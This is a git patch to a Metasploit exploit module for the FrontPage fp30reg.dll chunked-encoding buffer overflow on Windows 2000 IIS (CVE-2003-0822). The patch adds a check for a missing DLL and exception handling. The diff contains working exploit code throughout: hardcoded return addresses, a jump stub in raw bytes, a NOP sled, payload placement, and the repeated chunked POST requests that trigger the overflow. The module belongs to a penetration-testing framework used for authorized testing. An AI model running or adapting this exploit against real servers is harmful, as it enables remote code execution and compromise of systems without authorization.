From 06899ee8957f56dc96429f2f69c282cdde5fe9af Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 27 Feb 2007 09:31:54 +0000
Subject: [PATCH] This should fix #39, the exploit will detect when the DLL is
 not installed

git-svn-id: file:///home/svn/framework3/trunk@4484 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/isapi/fp30reg_chunked.rb | 66 +++++++++++--------
 1 file changed, 40 insertions(+), 26 deletions(-)

diff --git a/modules/exploits/windows/isapi/fp30reg_chunked.rb b/modules/exploits/windows/isapi/fp30reg_chunked.rb
index 2e8f241769..8585991bb6 100644
--- a/modules/exploits/windows/isapi/fp30reg_chunked.rb
+++ b/modules/exploits/windows/isapi/fp30reg_chunked.rb
@@ -1,5 +1,5 @@
 ##
-# $Id:$
+# $Id$
 ##
 
 ##
@@ -39,7 +39,6 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
 					[ 'CVE', ' 2003-0822'],
 					[ 'MSB', 'MS03-051'],
 					[ 'MIL', '29'],
-
 				],
 			'Privileged'     => false,
 			'Payload'        =>
@@ -54,55 +53,70 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
 				[
 					['Windows 2000 SP0-SP3',  { 'Ret' => 0x6c38a4d0  }],   # from mfc42.dll
 					['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1  }],   # from fp30reg.dll 07/22/2002
-					['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d  }],   # from fp30reg.dll 10/06/1999
-						
-					
+					['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d  }],   # from fp30reg.dll 10/06/1999	
 				],
 			'DisclosureDate' => 'Nov 11 2003',
 			'DefaultTarget' => 0))
 		
 			register_options(
 				[
-					OptString.new('URL', [ true,  "The path to fp30reg.dll.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]),
-				], self.class)
-							
+					OptString.new('URL', [ true,  "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]),
+				], self.class)					
 	end
 
 	def exploit
-		c = connect
-
+	
+		print_status("Creating overflow request for fp30reg.dll...")
+		
 		pat = Rex::Text.rand_text_alphanumeric(0xdead)
 		pat[128, 4] = [target.ret].pack('V')
 		pat[264, 4] = [target.ret].pack('V')
+
+		# sub eax,0xfffffeff; jmp eax
 		pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0"
+		
 		pat[280, 512] = make_nops(512)
 		pat[792, payload.encoded.length] = payload.encoded
 		
-		1.upto(15) do |i|
+		0.upto(15) do |i|
 			
 			if (i % 3 == 0)
-				print_status("Refreshing the remote DLLHost.exe process...")
-				send_request_raw({
+				print_status("Refreshing the remote dllhost.exe process...")
+				
+				res = send_request_raw({
 					'uri' => datastore['URL']
-				}, -1)		
+				}, -1)
+				
+				if (res and res.body =~ /specified module could not be found/)
+					print_status("The server states that #{datastore['URL']} does not exist.\n")
+					return
+				end						
 			end
 
 			print_status("Trying to exploit fp30reg.dll (request #{i.to_s} of 15)")
-			send_request_raw({
-				'uri'     => datastore['URL'],
-				'method'  => 'POST',
-				'headers' =>
-				{
-					'Transfer-Encoding' => 'Chunked'
-				},
-				'data'    => "DEAD\r\n#{pat}\r\n0\r\n"
-			}, 5)
+			begin
+				res = send_request_raw({
+					'uri'     => datastore['URL'],
+					'method'  => 'POST',
+					'headers' =>
+					{
+						'Transfer-Encoding' => 'Chunked'
+					},
+					'data'    => "DEAD\r\n#{pat}\r\n0\r\n"
+				}, 5)
 			
-			sock.put(req)	
-			sleep(1)
+				if (res and res.body =~ /specified module could not be found/)
+					print_status("The server states that #{datastore['URL']} does not exist.\n")
+					return
+				end
+			rescue ::Exception => e
+				p e
+				p e.class
+			end
 			
 			handler
-			disconnect
+			
+			sleep(1)
 		end
 	end